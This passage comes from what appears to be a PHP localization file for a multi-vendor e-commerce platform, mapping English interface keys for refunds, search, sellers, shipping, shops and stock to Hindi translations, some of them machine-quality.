changed!! Admin already change the statusapproved!!' => 'रिफंड स्टेटस नहीं बदला जा सकता है !! व्यवस्थापक पहले से ही StatusApproved को बदलें !!', 'refunded status can not be changed!! Admin already changed the status => approved!!' => 'रिफंड स्टेटस नहीं बदला जा सकता है !! व्यवस्थापक ने पहले से ही स्थिति बदल दी=> अनुमोदित !!', 'refunded status can not be changed!! Admin already changed the status =>rejected!!' => 'रिफंड स्टेटस नहीं बदला जा सकता है !! व्यवस्थापक ने पहले से ही स्थिति बदल दी=> अस्वीकार कर दिया !!', 'register' => 'पंजीकरण करवाना', 'register_control_your_order' => 'रजिस्टर अपने आदेश को नियंत्रित करें', 'register_control_your_order.' => 'अपने आदेश को नियंत्रित करें।', 'registration_success_login_now' => 'पंजीकरण सफलता लॉगिन अब', 'regular wear' => 'नियमित पहनने', 'reject' => 'अस्वीकार करना', 'rejected' => 'अस्वीकार कर दिया', 'rejected_note' => 'अस्वीकृत नोट', 'rejected_reason' => 'अस्वीकृत कारण', 'releans_sms' => 'एसएमएस', 'remaining_balance' => 'शेष राशि', 'remember_me' => 'मुझे याद करो', 'remove' => 'निकालना', 'remove_all' => 'सभी हटाएं', 'rename_company' => 'नाम बदलें कंपनी', 'rename_your_website' => 'अपनी वेबसाइट का नाम बदलें', 'reorder' => 'पुन=> व्यवस्थित करें', 'repeat' => 'दोहराना', 'repeat_password' => 'पासवर्ड दोहराएं', 'repeat_password_not_match' => 'पासवर्ड दोहराएं नहीं', 'reply' => 'जवाब', 'report' => 'प्रतिवेदन', 'reports' => 'रिपोर्टों', 'reports_&_Analysis' => 'रिपोर्ट और विश्लेषण', 'reports_and_analytics' => 'रिपोर्ट और विश्लेषिकी', 'request' => 'अनुरोध', 'request_time' => 'समय मांगें', 'required_Info_From_Customer' => 'ग्राहक से आवश्यक जानकारी', 'required_Information_from_Customer' => 'ग्राहक से आवश्यक जानकारी', 'reschedule' => 'पुनर्निर्धारित', 'resend' => 'पुन=> भेजें', 'resend_OTP' => 'ओटीपी पुनः भेजें', 'resend_code_within' => 'भीतर कोड को पुनरुत्थान करें', 'resend_notification' => 'अधिसूचना को फिर से लिखें', 'reset' => 'रीसेट', 'resource_type' => 'संसाधन प्रकार', 'responsibility' => 'ज़िम्मेदारी', 'restaurant' => 'रेस्टोरेंट', 'resubmit' => 'पुनः सबमिट करें', 'resume' => 'फिर शुरू करना', 'return policy' => 'वापसी नीति', 'return-policy' => 'वापसी नीति', 'return_policy' => 'वापसी नीति', 'returned' => 'लौटा हुआ', 'returned_orders' => 'आज्ञाओं को लौटा दिया', 'reund_requests' => 'पुनरुत्थान अनुरोध', 'review' => 'समीक्षा', 'review_List' => 'समीक्षा सूची', 'review_list' => 'समीक्षा सूची', 'review_table' => 'समीक्षा तालिका', 'reviewer' => 'आलोचक', 'reviews' => 'समीक्षा', 'right' => 'सही', 'roduct_list' => 'रोडक्ट सूची', 'role_form' => 'रोल फार्म', 'role_name' => 'भूमिका का नाम', 'roles_table' => 'रोल्स टेबल', 'root' => 'जड़', 'rtgr' => 'आरटीजीआर', 'safe_Payment' => 'सुरक्षित भुगतान', 'safe_payment' => 'सुरक्षित भुगतान', 'sale' => 'बिक्री', 'sale_report' => 'बिक्री रिपोर्ट', 'sales' => 'बिक्री', 'sales_&_Transaction_Report' => 'बिक्री और लेन -देन रिपोर्ट', 'sales_Commission' => 'बिक्री पर कमीशन', 'same' => 'वही', 'same_as_delivery_address' => 'डिलीवरी एड्रेस के रूप में भी', 'same_as_shipping_address' => 'शिपिंग पते के समान', 'sandbox' => 'सैंडबॉक्स', 'save' => 'बचाना', 'save_Changes' => 'परिवर्तनों को सुरक्षित करें', 'save_changes' => 'परिवर्तनों को सुरक्षित करें', 'save_information' => 'जानकारी सहेजें', 'save_informtion' => 'सूचना बचाओ', 'save_the_settings' => 'सेटिंग्स सहेजें', 'save_this_Address' => 'इस पते को सहेजें', 'save_this_address' => 'इस पते को सहेजें', 'saved_addresses' => 'पते बचाए गए', 'search' => 'खोज', 'search functions' => 'खोज कार्य', 'search...' => 'खोज...', 'search_Brands' => 'खोज ब्रांड', 'search_By_Order_Id' => 'आदेश आईडी द्वारा खोजें', 'search_Method_Name' => 'खोज विधि नाम', 'search_Product_Name' => 'खोज उत्पाद का नाम', 'search_Ticket_by_Subject_or_status' => 'विषय या स्थिति के अनुसार टिकट खोजें', 'search_brand' => 'खोज ब्रांड', 'search_by_Attribute_Name' => 'विशेषता नाम से खोजें', 'search_by_Banner_Type' => 'बैनर प्रकार द्वारा खोजें', 'search_by_ID_or_name' => 'आईडी या नाम से खोजें', 'search_by_Name_or_Category' => 'नाम या श्रेणी द्वारा खोजें', 'search_by_Name_or_Email_or_Phone' => 'नाम या ईमेल या फोन से खोजें', 'search_by_Name_or_Mobile_No_or_Email' => 'नाम या मोबाइल नहीं या ईमेल द्वारा खोजें', 'search_by_Name_or_Phone_or_Email' => 'नाम या फोन या ईमेल द्वारा खोजें', 'search_by_Order_ID' => 'आदेश आईडी द्वारा खोजें', 'search_by_Order_ID_or_Transaction_ID' => 'ऑर्डर आईडी या लेनदेन आईडी द्वारा खोजें', 'search_by_Product_Name' => 'उत्पाद नाम से खोजें', 'search_by_Product_or_Customer' => 'उत्पाद या ग्राहक द्वारा खोजें', 'search_by_Title' => 'शीर्षक द्वारा खोजें', 'search_by_Title_or_Code_or_Discount_Type' => 'शीर्षक या कोड या छूट प्रकार द्वारा खोजें', 'search_by_brands' => 'ब्रांडों द्वारा खोजें', 'search_by_email' => 'ईमेल द्वारा खोजें', 'search_by_name' => 'नाम से खोजें', 'search_by_name_or_category' => 'नाम या श्रेणी द्वारा खोजें', 'search_by_name_or_email_or_phone' => 'नाम या ईमेल या फोन से खोजें', 'search_by_name_oremail_or_phone' => 'ओरेमेल या फोन नाम से खोजें', 'search_by_order_ID' => 'आदेश आईडी द्वारा खोजें', 'search_by_order_id' => 'आदेश आईडी द्वारा खोजें', 'search_by_order_id_or_refund_id' => 'ऑर्डर आईडी या रिफंड आईडी द्वारा खोजें', 'search_by_orders_id' => 'आदेश आईडी द्वारा खोजें', 'search_by_orders_id_or_refund_id' => 'ऑर्डर आईडी या रिफंड आईडी द्वारा खोजें', 'search_by_orders_id_or_transaction_ID' => 'ऑर्डर आईडी या लेनदेन आईडी द्वारा खोजें', 'search_by_orders_id_or_transaction_id' => 'ऑर्डर आईडी या लेनदेन आईडी द्वारा खोजें', 'search_by_product_name' => 'उत्पाद नाम से खोजें', 'search_by_title' => 'शीर्षक द्वारा खोजें', 'search_customers' => 'खोज ग्राहक', 'search_data' => 'खोज डेटा', 'search_for_items_or_store' => 'आइटम या स्टोर के लिए खोजें', 'search_here' => 'यहां तलाश करो', 'search_menu' => 'खोज मेनू', 'search_orders' => 'आदेशों को खोजें', 'search_product_name' => 'खोज उत्पाद का नाम', 'search_products' => 'उत्पादों को खोजना', 'search_products_from_this_store' => 'इस स्टोर से उत्पाद खोजें', 'search_role' => 'खोज भूमिका', 'search_store' => 'खोज भंडार', 'search_tags' => 'खोज टैग', 'search_your_location_here' => 'अपना स्थान यहां खोजें', 'sec' => 'सेकंड', 'second_step' => 'दूसरा कदम', 'secondary_Color' => 'द्वितीयक रंग', 'secondary_banner_form' => 'द्वितीयक बैनर रूप', 'seconds' => 'सेकंड', 'secret' => 'गुप्त', 'secretKey' => 'गुप्त', 'secret_Key' => 'गुप्त कुंजी', 'secret_key' => 'गुप्त कुंजी', 'secured_information' => 'सुरक्षित सूचना', 'security_code' => 'सुरक्षा कोड', 'security_key' => 'Security key', 'see_Credential_Setup_Instructions' => 'क्रेडेंशियल सेटअप निर्देश देखें', 'see_More' => 'और देखें', 'see_all' => 'सभी देखें', 'see_all_products' => 'सभी उत्पाद देखें', 'see_more' => 'और देखें', 'see_the_latest_deals_and_exciting_new_offers' => 'नवीनतम सौदे और रोमांचक नए ऑफ़र देखें', 'select' => 'चुनना', 'select minimum one box' => 'न्यूनतम एक बॉक्स का चयन करें', 'select_Brand' => 'ब्रांड का चयन करें', 'select_Coupon_Type' => 'कूपन प्रकार का चयन करें', 'select_Date_Range' => 'दिनांक सीमा का चयन करें', 'select_Logout_below_if_you_are_ready_to_end_your_current_session' => 'यदि आप अपना वर्तमान सत्र समाप्त करने के लिए तैयार हैं, तो नीचे लॉगआउट का चयन करें', 'select_Payment_Method' => 'भुगतान का तरीका चुनें', 'select_Product' => 'उत्पाद का चयन करें', 'select_Sub_Category' => 'उप श्रेणी का चयन करें', 'select_Sub_Sub_Category' => 'उप उप श्रेणी का चयन करें', 'select_a_payment_method first' => 'पहले एक भुगतान विधि का चयन करें', 'select_an_app_type_and_press' => 'एक ऐप प्रकार का चयन करें और दबाएं', 'select_app_IDs' => 'ऐप आईडी का चयन करें', 'select_attributes' => 'विशेषताओं का चयन करें', 'select_brand' => 'ब्रांड का चयन करें', 'select_category' => 'श्रेणी चुनना', 'select_colors' => 'रंगों का चयन करें', 'select_country' => 'देश चुनें', 'select_coupon_bearer' => 'कूपन बियरर का चयन करें', 'select_coupon_type' => 'कूपन प्रकार का चयन करें', 'select_customer' => 'ग्राहक का चयन करें', 'select_customer_is_required' => 'ग्राहक का चयन करने की आवश्यकता है', 'select_customer_is_required!' => 'ग्राहक का चयन करने की आवश्यकता है!', 'select_date_range' => 'दिनांक सीमा का चयन करें', 'select_from_saved' => 'सहेजे से चयन करें', 'select_minimum_one_selection_box' => 'न्यूनतम एक चयन बॉक्स का चयन करें', 'select_payment_method' => 'भुगतान का तरीका चुनें', 'select_product' => 'उत्पाद का चयन करें', 'select_reCAPTCHA_v2_as_ReCAPTCHA_Type' => 'Recaptcha V2 को recaptcha प्रकार के रूप में चुनें', 'select_seller' => 'विक्रेता का चयन करें', 'select_seller_is_required' => 'चयन विक्रेता की आवश्यकता है', 'select_seller_is_required!' => 'चयन विक्रेता की आवश्यकता है!', 'select_service_IDs' => 'सेवा आईडी का चयन करें', 'select_shipping_method_first' => 'पहले शिपिंग विधि का चयन करें', 'select_status' => 'स्थिति का चयन करें', 'select_sub_type' => 'उप प्रकार का चयन करें', 'select_subcategory' => 'उपश्रेणी का चयन करें', 'select_the' => 'का चयन करें', 'select_theme' => 'चुनिंदा विषय', 'select_transaction_type' => 'लेनदेन प्रकार का चयन करें', 'select_variation' => 'भिन्नता का चयन करें', 'select_your_desire_category.' => 'अपनी इच्छा श्रेणी का चयन करें।', 'select_your_theme' => 'अपनी थीम का चयन करें', 'selected' => 'चयनित', 'self_delivery' => 'स्व -वितरण', 'self_product' => 'स्व -उत्पाद', 'sell_Digital_product' => 'डिजिटल उत्पाद बेचें', 'sell_on' => 'छूट शुरू', 'seller' => 'विक्रेता', 'seller added successfully' => 'विक्रेता ने सफलतापूर्वक जोड़ा', 'seller product test' => 'विक्रेता उत्पाद परीक्षण', 'seller shipping' => 'विक्रेता शिपिंग', 'seller test digital product 2' => 'विक्रेता परीक्षण डिजिटल उत्पाद 2', 'seller test product 1' => 'विक्रेता परीक्षण उत्पाद 1', 'seller variation wise product' => 'विक्रेता भिन्नता बुद्धिमान उत्पाद', 'seller wallet histor...' => 'विक्रेता बटुआ इतिहास ...', 'seller wallets' => 'विक्रेता बटुए', 'seller-Info' => 'विक्रेता-इनफो', 'seller_Details' => 'विक्रेता विवरण', 'seller_Discount' => 'विक्रेता छूट', 'seller_Earning' => 'विक्रेता कमाई', 'seller_Image' => 'विक्रेता छवि', 'seller_Info' => 'विक्रेता जानकारी', 'seller_Information' => 'विक्रेता जानकारी', 'seller_List' => 'विक्रेता सूची', 'seller_Net_Income' => 'विक्रेता शुद्ध आय', 'seller_Order' => 'विक्रेता आदेश', 'seller_Orders' => 'विक्रेता आदेश', 'seller_POS' => 'विक्रेता', 'seller_Product_List' => 'विक्रेता उत्पाद सूची', 'seller_Products' => 'विक्रेता उत्पाद', 'seller_Reports' => 'विक्रेता रिपोर्ट', 'seller_Sales' => 'विक्रेता बिक्री', 'seller_Wallet' => 'विक्रेता बटुआ', 'seller_Wallet_Status' => 'विक्रेता बटुए की स्थिति', 'seller_amount' => 'विक्रेता राशि', 'seller_app_version_control' => 'विक्रेता ऐप संस्करण नियंत्रण', 'seller_apply' => 'विक्रेता आवेदन', 'seller_b' => 'विक्रेता बी', 'seller_can_set_own_shop_order_limit_individually' => 'विक्रेता व्यक्तिगत रूप से स्वयं की दुकान आदेश सीमा निर्धारित कर सकते हैं', 'seller_details' => 'विक्रेता विवरण', 'seller_discount' => 'विक्रेता छूट', 'seller_earnings' => 'विक्रेता कमाई', 'seller_email' => 'विक्रेता ईमेल', 'seller_image' => 'विक्रेता छवि', 'seller_info' => 'विक्रेता जानकारी', 'seller_information' => 'विक्रेता जानकारी', 'seller_is' => 'विक्रेता है', 'seller_list' => 'विक्रेता सूची', 'seller_login' => 'विक्रेता लॉगिन', 'seller_name' => 'विक्रेता का नाम', 'seller_net_income' => 'विक्रेता शुद्ध आय', 'seller_phone' => 'विक्रेता फोन', 'seller_pos_permission_updated.' => 'विक्रेता पीओएस अनुमति अद्यतन किया गया।', 'seller_product_sale_Report' => 'विक्रेता उत्पाद बिक्री रिपोर्ट', 'seller_reg' => 'विक्रेता', 'seller_registration' => 'विक्रेता पंजीकरण', 'seller_settings' => 'विक्रेता सेटिंग्स', 'seller_setup' => 'विक्रेता सेटअप', 'seller_shipping_method' => 'विक्रेता नौवहन पद्धति', 'seller_table' => 'विक्रेता सारणी', 'seller_wallet' => 'विक्रेता बटुआ', 'seller_wise_shipping' => 'विक्रेता बुद्धिमान शिपिंग', 'seller_wise_shipping_method' => 'विक्रेता बुद्धिमान शिपिंग विधि', 'seller_withdraws' => 'विक्रेता वापस ले लेता है', 'seller_zone' => 'विक्रेता क्षेत्र', 'sellers' => 'सेलर्स', 'sellers_can_see_all_products_that_need_to_be_re_stocked_in_a_section_when_they_reach_this_ReOrder_Level' => 'विक्रेता उन सभी उत्पादों को देख सकते हैं जिन्हें इस पुन=> स्तर पर पहुंचने पर एक अनुभाग में फिर से स्टॉक करने की आवश्यकता होती है', 'sellers_will_download_the_latest_seller_app_version_using_this_URL' => 'विक्रेता इस URL का उपयोग करके नवीनतम विक्रेता ऐप संस्करण डाउनलोड करेंगे', 'sellers_will_handle_the_shipping_responsibilities_when_you_choose_seller_wise_shipping_method' => 'जब आप विक्रेता समझदार शिपिंग विधि चुनते हैं तो विक्रेता शिपिंग जिम्मेदारियों को संभालेंगे', 'sellersfgm .' => 'Sellersfgm।', 'selling_price' => 'विक्रय मूल्य', 'senang_pay' => 'सुखद वेतन', 'send' => 'भेजना', 'send successfully' => 'सफलतापूर्वक भेजें', 'send_Notification' => 'अधिसूचना भेजें', 'send_Reply' => 'उत्तर भेजें', 'send_a_message' => 'एक संदेश भेजो', 'send_a_test_mail_to_your_email' => 'अपने ईमेल पर एक परीक्षण मेल भेजें', 'send_mail' => 'मेल भेजने', 'send_notification' => 'अधिसूचना भेजें', 'send_successfully' => 'सफलतापूर्वक भेजें', 'send_test_mail' => 'टेस्ट मेल भेजें', 'send_us_a_message' => 'हमें एक संदेश भेजें', 'send_your_wallet_money_while_order' => 'ऑर्डर करते समय अपना बटुआ पैसा भेजें', 'sendgrid_mail' => 'सेंडग्रिड मेल', 'sendgrid_mail_config' => 'SendGrid मेल कॉन्फ़िगरेशन', 'sent' => 'भेजा', 'sent_in_your_email' => 'आपके ईमेल में भेजा गया', 'sent_in_your_phone' => 'आपके फोन में भेजा गया', 'seo_section' => 'सीओ अनुभाग', 'server' => 'सर्वर', 'server_Key' => 'सर्वर कुंजी', 'server_key' => 'Server key', 'set_Priority' => 'प्राथमिकता दर्ज करें', 'set_Up' => 'स्थापित करना', 'set_delivery_address' => 'वितरण पता सेट करें', 'set_from_map' => 'नक्शे से सेट करें', 'set_how_users_of_recover_their_forgotten_password' => 'सेट करें कि उपयोगकर्ता अपने भूल गए पासवर्ड को कैसे पुनर्प्राप्त करते हैं', 'set_minimum_order_amount' => 'न्यूनतम आदेश राशि निर्धारित करें', 'set_the_Tax_Amount_in_percentage_here' => 'यहां प्रतिशत में कर राशि निर्धारित करें', 'set_the_default_commission_amount_that_will_be_received_from_sellers_on_each_order' => 'प्रत्येक आदेश पर विक्रेताओं से प्राप्त डिफ़ॉल्ट कमीशन राशि निर्धारित करें', 'set_the_earning_amount_for_each_successful_referral' => 'प्रत्येक सफल रेफरल के लिए कमाई की राशि निर्धारित करें', 'set_the_minimum_order_amount_a_customer_must_order_from_the_inhouse_shop' => 'न्यूनतम आदेश राशि निर्धारित करें एक ग्राहक को इनहाउस शॉप से ऑर्डर करना होगा', 'set_the_minimum_order_quantity_that_customers_must_choose._Otherwise _the_checkout_process_wonât_start' => 'उन न्यूनतम ऑर्डर की मात्रा निर्धारित करें जो ग्राहकों को चुनना चाहिए। अन्यथा चेकआउट प्रक्रिया ने शुरू किया', 'set_the_selling_price_for_each_unit_of_this_product._This_Unit_Price_section_wonât_be_applied_if_you_set_a_variation_wise_price' => 'इस उत्पाद की प्रत्येक इकाई के लिए विक्रय मूल्य निर्धारित करें। यदि आप एक भिन्नता बुद्धिमान मूल्य निर्धारित करते हैं तो यह यूनिट मूल्य अनुभाग जीता जाता है', 'set_the_shipping_cost_for_this_product_here._Shipping_cost_will_only_be_applicable_if_product-wise_shipping_is_enabled.' => 'इस उत्पाद के लिए शिपिंग लागत यहां सेट करें। शिपिंग लागत केवल तभी लागू होगी जब उत्पाद-वार शिपिंग सक्षम हो।', 'set_the_stock_limit_for_the_Reorder_level' => 'Reorder स्तर के लिए स्टॉक सीमा निर्धारित करें', 'set_the_tax_calculation_method_from_here._Select_âInclude_with_productâ_to_combine_product_price_and_tax_on_the_checkout._Pick_âExclude_from_productâ_to_display_product_price_and_tax_amount_separately.' => 'कर गणना विधि यहां से सेट करें। चेकआउट पर उत्पाद मूल्य और कर को संयोजित करने के लिए Productâ के साथ शामिल करें का चयन करें। उत्पाद की कीमत और कर राशि को अलग से प्रदर्शित करने के लिए productâ से बाहर छोड़ दें।', 'set_vacation_mode_for_shop_means_you_will_be_not_available_receive_order_and_provider_products_for_placed_order_at_that_time' => 'शॉप के लिए वेकेशन मोड सेट करें इसका मतलब है कि आप उस समय रखे गए ऑर्डर के लिए ऑर्डर और प्रदाता उत्पाद प्राप्त नहीं करेंगे', 'set_whether_sellers_need_admin_approval_before_adding_new_products_to_their_shops' => 'सेट करें कि क्या विक्रेताओं को अपनी दुकानों में नए उत्पादों को जोड़ने से पहले व्यवस्थापक अनुमोदन की आवश्यकता है', 'setting' => 'सेटिंग', 'settings' => 'समायोजन', 'setup' => 'स्थापित करना', 'sgred' => 'धूर्तता', 'share' => 'शेयर करना', 'shipping' => 'शिपिंग', 'shipping Cost' => 'शिपिंग लागत', 'shipping addresses' => 'भेजने का पता', 'shipping methods' => 'शिपिंग विधियां', 'shipping types' => 'शिपिंग प्रकार', 'shipping_Address' => 'शिपिंग पता', 'shipping_Charge' => 'भेजने की लागत', 'shipping_Fee' => 'शिपिंग शुल्क', 'shipping_Method' => 'शिपिंग का तरीका', 'shipping_Method_deleted_successfully' => 'शिपिंग विधि सफलतापूर्वक हटा दी गई', 'shipping_address' => 'शिपिंग पता', 'shipping_address_has_been_given_below' => 'शिपिंग पता नीचे दिया गया है', 'shipping_and_billing_address' => 'नौवहन और बिलिंग पता', 'shipping_charge' => 'भेजने की लागत', 'shipping_confirmation_email' => 'शिपिंग पुष्टिकरण ईमेल', 'shipping_cost' => 'शिपिंग लागत', 'shipping_cost_multiply_with_quantity' => 'शिपिंग लागत मात्रा के साथ गुणा', 'shipping_details' => 'शिपिंग की जानकारियां', 'shipping_earn' => 'शिपिंग अर्जित', 'shipping_fee' => 'शिपिंग शुल्क', 'shipping_id_is_required' => 'शिपिंग आईडी की आवश्यकता है', 'shipping_info' => 'शिपिंग जानकारी', 'shipping_input_by_customer' => 'ग्राहक द्वारा शिपिंग इनपुट', 'shipping_method' => 'शिपिंग का तरीका', 'shipping_method_for_In-house_deliver' => 'इन-हाउस डिलीवरी के लिए शिपिंग विधि', 'shipping_method_update' => 'शिपिंग विधि अद्यतन', 'shipping_method_updated_successfully' => 'शिपिंग विधि सफलतापूर्वक अपडेट की गई', 'shipping_method_updated_successfully!!' => 'शिपिंग विधि सफलतापूर्वक अपडेट की गई !!', 'shipping_responsibility' => 'नौवहन जिम्मेदारी', 'shipping_responsibility_updated_successfully' => 'शिपिंग जिम्मेदारी सफलतापूर्वक अपडेट की गई', 'shipping_responsibility_updated_successfully!!' => 'शिपिंग जिम्मेदारी सफलतापूर्वक अपडेट की गई !!', 'shipping_to' => 'को नौवहन', 'shipping_type' => 'शिपिंग प्रकार', 'shipping_type_updated_successfully!!' => 'शिपिंग प्रकार सफलतापूर्वक अपडेट किया गया !!', 'shop' => 'दुकान', 'shop followers' => 'दुकानदार अनुयायी', 'shop_Info' => 'दुकान की जानकारी', 'shop_Information' => 'दुकान की सूचना', 'shop_Name' => 'दुकान का नाम', 'shop_Page' => 'दुकान पृष्ठ', 'shop_address' => 'दुकान का पता', 'shop_again_from_your_recent_store' => 'अपने हाल के स्टोर से फिर से खरीदारी करें', 'shop_banner' => 'दुकान का बैनर', 'shop_bottom_banner' => 'शॉप बॉटम बैनर', 'shop_cart' => 'दुकानदार', 'shop_details' => 'दुकान विवरण', 'shop_does_not_exist' => 'दुकान मौजूद नहीं है', 'shop_info' => 'दुकान की जानकारी', 'shop_information' => 'दुकान की सूचना', 'shop_logo' => 'दुकान का लोगो', 'shop_name' => 'दुकान का नाम', 'shop_now' => 'अभी खरीदें', 'shop_overview' => 'दुकान अवलोकन', 'shop_page' => 'दुकान पृष्ठ', 'shop_secondary_banner' => 'दुकानदार बैनर', 'shop_settings' => 'दुकान सेटिंग', 'shop_view' => 'दुकान का दृश्य', 'shop_wise_with' => 'के साथ खरीदारी करना', 'shopping_cart' => 'शॉपिंग कार्ट', 'shopping_details' => 'शॉपिंग विवरण', 'shops' => 'दुकानें', 'short_cut_keys' => 'शॉर्टकट कुंजियाँ', 'short_description' => 'संक्षिप्त वर्णन', 'short_title' => 'छोटा शीर्षक', 'show' => 'दिखाओ', 'show_Billing_Address_In_Checkout' => 'चेकआउट में बिलिंग पता दिखाएं', 'show_as_featured' => 'शो के रूप में दिखाया गया', 'show_brand' => 'ब्रांड दिखाओ ब्रांड', 'show_brand =>' => 'ब्रांड दिखाएँ=>', 'show_data' => 'डेटा दिखाओ', 'show_data_by_date_range' => 'दिनांक सीमा द्वारा डेटा दिखाएं', 'show_hide_food_menu' => 'भोजन मेनू दिखाओ', 'show_locations_on_map' => 'मानचित्र पर स्थान दिखाएं', 'show_password' => 'पासवर्ड दिखाए', 'sid' => 'सिड', 'sidebar_Banner' => 'साइडबार बैनर', 'sign-up' => 'साइन अप करें', 'sign_Out' => 'साइन आउट', 'sign_in' => 'दाखिल करना', 'sign_in_with_facebook' => 'फ़ेसबुक से साइन इन करें', 'sign_in_with_google' => 'Google के साथ साइन इन करें', 'sign_out' => 'साइन आउट', 'sign_up' => 'साइन अप करें', 'sign_up_with_facebook' => 'फेस्बूक के साथ साइन अप करें', 'sign_up_with_google' => 'Google के साथ साइन अप करें', 'signature_product' => 'हस्ताक्षर उत्पाद', 'signature_product_for_this_season' => 'इस मौसम के लिए हस्ताक्षर उत्पाद', 'similar' => 'समान', 'similar_Products_From_Other_Stores' => 'अन्य दुकानों से इसी तरह के उत्पाद', 'similar_category_product' => 'इसी तरह की श्रेणी उत्पाद', 'similar_product_from_this_store' => 'इस स्टोर से इसी तरह का उत्पाद', 'similar_product_not_available' => 'इसी तरह का उत्पाद उपलब्ध नहीं है', 'similar_products' => 'इसी तरह के उत्पादों', 'sing_in' => 'दाखिल करना', 'sing_in_with_facebook' => 'फ़ेसबुक से साइन इन करें', 'sing_in_with_google' => 'Google के साथ साइन इन करें', 'sing_up' => 'साइन अप करें', 'sing_up_with_facebook' => 'फेस्बूक के साथ साइन अप करें', 'sing_up_with_google' => 'Google के साथ साइन अप करें', 'single_shipping_method' => 'एकल शिपिंग पद्धति', 'single_vendor' => 'एकल विक्रेता', 'site_Key' => 'कार्यस्थल की कुंजी', 'site_URL' => 'साइट URL', 'size' => 'आकार', 'skip' => 'छोडना', 'sl' => 'क्र', 'sl#' => 'Sl#', 'slug' => 'काउंटर', 'sms' => 'एसएमएस', 'sms_gateways_configuration' => 'एसएमएस गेटवे कॉन्फ़िगरेशन', 'sms_setup' => 'एसएमएस सेटअप', 'smtp' => 'एसएमटीपी', 'smtp.mailtrap.io' => 'Smtp.mailtrap.io', 'smtp_mail' => 'SMTP मेल', 'smtp_mail_config' => 'SMTP मेल कॉन्फ़िगरेशन', 'so_that_they_can_also_update_their_store_banners_according_to_the_new_theme_ratio' => 'ताकि वे नए थीम अनुपात के अनुसार अपने स्टोर बैनर को भी अपडेट कर सकें', 'social_Link_Is_Requeired.' => 'सामाजिक लिंक की आवश्यकता होती है।', 'social_Login' => 'सामाजिक लॉगिन', 'social_Media_Already_taken' => 'सोशल मीडिया पहले से ही लिया गया', 'social_Media_Chatting' => 'सोशल मीडिया चैटिंग', 'social_Media_Links' => 'सोशल मीडिया लिंक', 'social_Media_inserted_Successfully.' => 'सोशल मीडिया सफलतापूर्वक डाला।', 'social_Name_Is_Requeired.' => 'सामाजिक नाम की आवश्यकता है।', 'social_info_updated_successfully.' => 'सामाजिक जानकारी सफलतापूर्वक अपडेट की गई।', 'social_login' => 'सामाजिक लॉगिन', 'social_media' => 'सामाजिक मीडिया', 'social_media_deleted_successfully.' => 'सोशल मीडिया सफलतापूर्वक हटा दिया गया।', 'social_media_form' => 'सोशल मीडिया फॉर्म', 'social_media_link' => 'सोशल मीडिया लिंक', 'social_media_table' => 'सोशल मीडिया टेबल', 'software' => 'सॉफ़्टवेयर', 'software_update' => 'सॉफ्टवेयर अपडेट', 'software_version' => 'सॉफ्टवेयर संस्करण', 'sold' => 'बिका हुआ', 'some_actions_are_disabled_because_the_admin_added_coupons' => 'कुछ क्रियाएं अक्षम हैं क्योंकि व्यवस्थापक ने कूपन जोड़े हैं', 'some_features_will_changed' => 'कुछ सुविधाएँ बदल जाएंगी', 'some_status_buttons_are_disabled_because_the_admin_added_coupons' => 'कुछ स्थिति बटन अक्षम हैं क्योंकि व्यवस्थापक ने कूपन जोड़े हैं', 'soon_Stock_Out' => 'जल्द ही स्टॉक', 'sorry' => 'क्षमा मांगना', 'sorry_no_review_found_to_show_you' => 'क्षमा करें कोई समीक्षा आपको दिखाने के लिए नहीं मिली', 'sorry_product_is_out_of_stock.' => 'क्षमा करें उत्पाद स्टॉक से बाहर है।', 'sorry_product_out_of_stock' => 'सॉरी उत्पाद स्टॉक से बाहर', 'sorry_stock_is_limited' => 'सॉरी स्टॉक सीमित है', 'sorry_stock_limit_exceeded.' => 'क्षमा करें स्टॉक सीमा पार हो गई।', 'sorry_the_minimum_order_quantity_does_not_match' => 'क्षमा करें, न्यूनतम ऑर्डर की मात्रा मेल नहीं खाती है', 'sorry_this_item_is_currently_sold_out' => 'क्षमा करें, यह आइटम बिक चुका है', 'sort_by' => 'इसके अनुसार क्रमबद्ध करें', 'sort_by_(high_to_low)' => 'क्रम से (उच्च से उच्च)', 'sort_by_(low_to_high)' => 'क्रम से (उच्च से उच्च)', 'sound' => 'आवाज़', 'special' => 'विशेष', 'ssl commerz' => 'एसएसएल कॉमरेज़', 'ssl_commerz' => 'एसएसएल कॉमरेज़', 'ssl_commerz_payment' => 'एसएसएल कॉमर्ज़ भुगतान', 'sslcommerz' => 'Sslcommerz', 'star' => 'तारा', 'start' => 'शुरू', 'start Date' => 'आरंभ करने की तिथि', 'start date' => 'आरंभ करने की तिथि', 'start_Date' => 'आरंभ करने की तिथि', 'start_a_conversation' => 'एक बातचीत शुरू', 'start_a_new_message' => 'एक नया संदेश शुरू करें', 'start_date' => 'आरंभ करने की तिथि', 'start_from' => 'से शुरु करें', 'start_typing' => 'टाइप करना शुरू करें', 'start_typing...' => 'टाइप करना शुरू करें...', 'started_on' => 'को प्रारंभ करें', 'status' => 'स्थिति', 'status updated successfully' => 'स्थिति को सफलतापूर्वक अपडेट किया गया', 'status_Update_Successfully' => 'स्टेटस अपडेट सफलतापूर्वक', 'status_change_successfully' => 'स्थिति सफलतापूर्वक बदलती है', 'status_not_changable_now' => 'स्थिति अब परिवर्तनशील नहीं है', 'status_update_failed' => 'स्थिति अद्यतन विफल', 'status_update_failed.' => 'स्थिति अपडेट विफल रहा।', 'status_updated_failed.' => 'अद्यतन की गई स्थिति विफल रही।', 'status_updated_successfully' => 'स्थिति को सफलतापूर्वक अपडेट किया गया', 'stock' => 'भंडार', 'stock_Available' => 'स्टॉक उपलब्ध', 'stock_available' => 'स्टॉक उपलब्ध', 'stock_limit_products' => 'स्टॉक सीमा उत्पाद', 'stock_limit_products_list' => 'स्टॉक सीमा उत्पाद सूची', 'stock_not_available' => 'स्टॉक उपलब्ध नहीं है', 'stock_out' => 'स्टॉक से बाहर', 'stock_sort_by_(high_to_low)' => 'स्टॉक सॉर्ट द्वारा (उच्च से निम्न)', 'stock_sort_by_(low_to_high)' => 'स्टॉक सॉर्ट द्वारा (कम से उच्च)', 'stock_status' => 'स्टॉक की अवस्था', 'storage_bucket' => 'भंडारण बकेट', 'store' => 'इकट्ठा करना', 'store_Client_ID' => 'स्टोर क्लाइंट आईडी', 'store_Client_Secret_Key' => 'स्टोर क्लाइंट सीक्रेट कुंजी', 'store_ID' => 'भंडार आईडी', 'store_address' => 'भंडार पता', 'store_banner' => 'भंडार बैनर', 'store_list' => 'भंडार सूची', 'store_logo' => 'लोगो भंडार', 'store_name' => 'स्टोर नाम', 'store_password' => 'भंडार पासवर्ड', 'stores' => 'स्टोर', 'stores_one' => 